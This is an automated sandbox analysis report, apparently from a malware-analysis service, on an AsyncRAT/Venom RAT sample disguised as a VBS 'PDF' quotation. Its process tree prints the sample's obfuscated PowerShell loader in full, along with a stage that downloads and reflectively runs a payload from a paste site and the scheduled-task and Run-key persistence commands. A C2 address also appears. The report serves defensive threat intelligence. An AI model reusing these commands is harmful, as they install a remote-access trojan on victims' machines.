asyncrat | c8745638f7e73d20f8637b0b64dc8db76ec128acfc62991a5fc57f82369a56d7

Analysis

max time kernel
135s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
31/03/2025, 13:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

COTIZACIÓN_23-5_Pdf.vbs
Size

8.5MB
MD5

60ec698e60d2fb823393bc2ee1664742
SHA1

4c632c11036d0eec042d9eddb2b351ae2ed3caf4
SHA256

19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1
SHA512

e2e179b5444aa9fab84cb939a4864289bb61a4d2198a07e920eac9de5c1a210771f190b8d7470224007ec4b7d9442b37dfff8d2023258516960b207070c03e6f
SSDEEP

96:5JTmIl/6GLHWtZdJ7AZPFZI6kNl5C+VwX2vR5VU3hOGIAKJV2T45aBSSFfkD:TllyjjdVMFZNkNls2vv8hAJJV8ve

Score

10^/10

asyncrat default defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://textbin.net/raw/ezjmofz3s6

exe.dropper

https://textbin.net/raw/ezjmofz3s6

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

196.251.89.167:6900

Mutex

vcbkomkyscjsqqkd

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
6	2996	powershell.exe
29	2996	powershell.exe
34	5604	powershell.exe
41	5604	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5604	powershell.exe
6084	powershell.exe
4208	powershell.exe
5552	powershell.exe
1340	powershell.exe
2996	powershell.exe
2584	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2308	cmd.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5604 set thread context of 4996	5604	powershell.exe	116

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5380	schtasks.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
1340	powershell.exe
1340	powershell.exe
2996	powershell.exe
2996	powershell.exe
5604	powershell.exe
5604	powershell.exe
5604	powershell.exe
2360	powershell.exe
2360	powershell.exe
2584	powershell.exe
2584	powershell.exe
2696	powershell.exe
2696	powershell.exe
2360	powershell.exe
2584	powershell.exe
2696	powershell.exe
2584	powershell.exe
6084	powershell.exe
6084	powershell.exe
6084	powershell.exe
4208	powershell.exe
4208	powershell.exe
5552	powershell.exe
5552	powershell.exe
4996	MSBuild.exe
4996	MSBuild.exe
4996	MSBuild.exe
4996	MSBuild.exe
4996	MSBuild.exe
4996	MSBuild.exe
4996	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeDebugPrivilege	5604	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	6084	powershell.exe
Token: SeDebugPrivilege	4208	powershell.exe
Token: SeDebugPrivilege	5552	powershell.exe
Token: SeDebugPrivilege	4996	MSBuild.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4996	MSBuild.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 220 wrote to memory of 3676	220	WScript.exe	86
PID 220 wrote to memory of 3676	220	WScript.exe	86
PID 220 wrote to memory of 5380	220	WScript.exe	88
PID 220 wrote to memory of 5380	220	WScript.exe	88
PID 220 wrote to memory of 1340	220	WScript.exe	90
PID 220 wrote to memory of 1340	220	WScript.exe	90
PID 1340 wrote to memory of 2996	1340	powershell.exe	92
PID 1340 wrote to memory of 2996	1340	powershell.exe	92
PID 2996 wrote to memory of 5604	2996	powershell.exe	99
PID 2996 wrote to memory of 5604	2996	powershell.exe	99
PID 5604 wrote to memory of 2584	5604	powershell.exe	100
PID 5604 wrote to memory of 2584	5604	powershell.exe	100
PID 5604 wrote to memory of 2360	5604	powershell.exe	101
PID 5604 wrote to memory of 2360	5604	powershell.exe	101
PID 5604 wrote to memory of 2696	5604	powershell.exe	102
PID 5604 wrote to memory of 2696	5604	powershell.exe	102
PID 2584 wrote to memory of 6084	2584	powershell.exe	103
PID 2584 wrote to memory of 6084	2584	powershell.exe	103
PID 2308 wrote to memory of 4208	2308	cmd.exe	106
PID 2308 wrote to memory of 4208	2308	cmd.exe	106
PID 4208 wrote to memory of 944	4208	powershell.exe	107
PID 4208 wrote to memory of 944	4208	powershell.exe	107
PID 944 wrote to memory of 5552	944	WScript.exe	108
PID 944 wrote to memory of 5552	944	WScript.exe	108
PID 5552 wrote to memory of 5896	5552	powershell.exe	110
PID 5552 wrote to memory of 5896	5552	powershell.exe	110
PID 5604 wrote to memory of 4996	5604	powershell.exe	116
PID 5604 wrote to memory of 4996	5604	powershell.exe	116
PID 5604 wrote to memory of 4996	5604	powershell.exe	116
PID 5604 wrote to memory of 4996	5604	powershell.exe	116
PID 5604 wrote to memory of 4996	5604	powershell.exe	116
PID 5604 wrote to memory of 4996	5604	powershell.exe	116
PID 5604 wrote to memory of 4996	5604	powershell.exe	116
PID 5604 wrote to memory of 4996	5604	powershell.exe	116

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:220
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
  2⤵
  PID:3676
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★W★BR★DQ★M★BK★HU★SgBP★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs');powershell $Yolopolhggobek;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1340
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/XQ40JuJO/r/ee.etsap//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5604
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2584
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6084
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2696
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:2308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4208
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÃ“N_23-5_Pdf.vbs'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5552
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\COTIZACIÃ“N_23-5_Pdf.vbs
        5⤵
        
        PID:5896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
cfc33092dc50e98e570a6613a83bdc53

SHA1
850e2b180a92a4c041ccb12fe7997a7dcf5f8c0a

SHA256
a8c94a5edce9af82e6c4ba995011f6daf9afca0b0586f9cb70bbd4fbfa28717e

SHA512
1b2433643eb2c6c277b515dcf50f267a9a846c538cad60d1f2c0cbedc0ef53fd9a284a26f48660bf2c0bea12f0d39c0daf2a0e6f42e742d5977cbcfb9c7aa037

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
20241bd3f8c7abe4bb7b83e4e4044a7c

SHA1
15a2ec5e3df03c28f095a7f04fccc9053fd9b6ad

SHA256
2cdca5fc0501c78997e459e71ac26bd03a823f8884474fafa1d77c26914d794a

SHA512
55dcd787b7d083eed1207e49ee41ae5a547ae22d8709a271d6aecc9cc5c2b51f8872a1fea27c76f436af36032cabb15f1af872fb69dbb8a009c8c4d3240cce5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
9f26ef3e9541e4e02217d0828f0d06e2

SHA1
e4debe1ca46f9964de12e297610c2f6440e27a9a

SHA256
5bc54f8c4ff03549b3cbb7f82189fb3e96db39c2911aedccefea48510711b996

SHA512
9e3a40afaeeaaa9f2cd9d1bdc04ef03f9b4fb82f3c83b0f8e4b355f0985f6788ab92df2608c80f5078fd7bd8e6f8ef7a84162d7228a6ac967f33acfd244ed67f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5ccd46bac0efd8dde2cbebfaa7aac14d

SHA1
c28cb22517d9ed9ac0934f35bdece5fcfa41297b

SHA256
d928f0fcd756931cfa7bec57b519580315e48f2642ef9efa67986b3632df6eaa

SHA512
d0452ba911677f36175825f44cc4ce80fbd9cb0e759b9bd47c24219a9dcd6a7591ab5898e4cbda42cb680fccf2c1f92b27703fd3371ce879c22e93070e92ad97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b5c16f0e9e4e6b870b638469ddd25c7f

SHA1
92b7d2fb1446838c5cccb6f7da7844b958cc917e

SHA256
a607d7cdb651732b7c2aa63868166fc529d7a8ef2ff757b871ef7637f9ee126f

SHA512
3f78c824dc9a239f73c752f44c0ed3329d1f3f8a1ce0ce7c3c86f7367f6de6fd18bd13e44c29e175aad082e070de230f6a52e8a1e0a92056c65df010b36b1bf6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
57158af151c68883072bd7361bba795a

SHA1
6ec250debe8a8db244a902e20e570d7a4c111bb4

SHA256
2538ecfb43d6f9e8acc31ca89c002a61df14b5353b41147449f612e78207cfe1

SHA512
0f9851d26c85b8a5c30aeeede64b4afec51936a2ebd3c46b4217518eb3b636fc67197dc141bf4ad83f3a0606531c11e4e34b228e907fb15554913a5e9bf38ae5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cuokzbyu.a4o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
34B

MD5
551de3894acfc565eaf2ea5fd7a7760a

SHA1
39a4d83c3d551deca48be49fda4a2d1824c084b8

SHA256
ff53ba58dd8ec7f149bd3aa6c14b60baf059d46cc0b312f234858710f6c3635f

SHA512
5545f75a3c632756807a6dbeec49af2f645ae295d27f0df0c4205b505baadf8d5b5057a0fb95a6edc79bbd2c561e619c8c3e2c707d09b8354285c9ef735f3e8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll02.txt

Filesize
300KB

MD5
1ed4ff6b14c799919ea5baaa9a01134d

SHA1
8d498985e857c1ec16c9f0b05cae4d684fb145da

SHA256
6d7cfe7ef865d8a7f4cee574736cf8ccf1b5dcba1c3c3b48a50498038921b384

SHA512
2ae2eab2f09e7499a8e078e35765868d5d8ca77e59ecb97c46700f7d2c4d324f438b63a81084de5ec484efa9383775688726136a8a02c82b0c0d9c1852ae5c1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll03.ps1

Filesize
988B

MD5
2e34e9ef86b79d3974864f9806080abd

SHA1
62c70a08dc7ef85500613ecf0df794e1c11407a1

SHA256
9117cd1b2842dfc4128adedf4354762c67c7c001375a03ea3735758721487fe7

SHA512
95bf30ba6617542c3f2f5bfbacadce4d0198c4e213cadab6fc56bc4f5400b0dae07c3caf511dd9e9edf81194b626366bce6692cb5a639ed8c822be27a4bb9804

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
282B

MD5
b094f227c79abfc0903a9b305203075a

SHA1
fd0fc367d2ef0027cf935264da182389db464e5b

SHA256
0c3a5a7559e7c46a0769022433588e0db2fa750d2c871c6909332a6719f61833

SHA512
5a4202474e5f71318d95717ed4fc6887e3c5aff0aa98c951a426ad12a8a842add837b52ee99bef93f8a37a7b741c00a8e6f3979d76be4c2a92dbefb95631e129

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx2.vbs

Filesize
203B

MD5
134dc516b72e8b4b3b44997273237301

SHA1
8144e4597433a94635472b46e49246af8ed6d58e

SHA256
0cfbd590d3e9320194bc954d8559d1e33d4c4f3670ebe5eb8319401f118a1d34

SHA512
